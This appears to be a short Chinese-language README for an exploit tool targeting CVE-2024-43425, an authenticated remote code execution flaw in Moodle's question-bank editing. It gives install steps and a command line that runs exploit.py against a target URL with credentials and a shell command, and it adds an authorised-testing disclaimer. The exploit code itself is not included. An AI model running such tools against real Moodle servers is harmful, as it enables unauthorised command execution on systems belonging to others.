CVE: CVE-2024-43425
该漏洞利用针对上述 Moodle 版本中已验证的远程代码执行(RCE)漏洞。它允许拥有有效凭据的攻击者通过利用不安全的题库编辑功能在服务器上执行任意命令。
pip install -r requirements.txt
python exploit.py --url http://target_moodle_url --username your_username --password your_password --cmd "whoami"

本漏洞利用程序仅供教育和授权测试目的使用。未经授权对你未拥有或明确许可测试的系统使用是非法且不道德的。
只是一个小的调整。